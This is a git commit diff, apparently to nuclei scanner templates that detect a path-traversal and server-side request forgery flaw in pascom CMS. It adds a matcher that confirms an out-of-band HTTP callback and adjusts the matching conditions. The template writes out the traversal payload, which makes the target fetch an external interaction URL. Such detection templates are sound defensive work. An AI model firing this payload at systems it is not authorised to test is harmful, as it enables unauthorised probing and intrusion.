additional matcher update

patch-1
sandeep 2022-03-19 16:10:43 +05:30
parent 7c799e935c
commit a97dccb54a
2 changed files with 7 additions and 3 deletions

View File

@ -16,8 +16,13 @@ requests:
path:
- "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}" # Triple parent because endpoint access via backend (parent of index CMS)
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

View File

@ -30,6 +30,5 @@ requests:
- type: dsl
dsl:
- "status_code_2 != status_code_1"
# - "status_code_2 == 200" # This would contradict the matcher below if enabled, because it reduces false-positives - while the status of traversal isn't always OK (200)
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
condition: and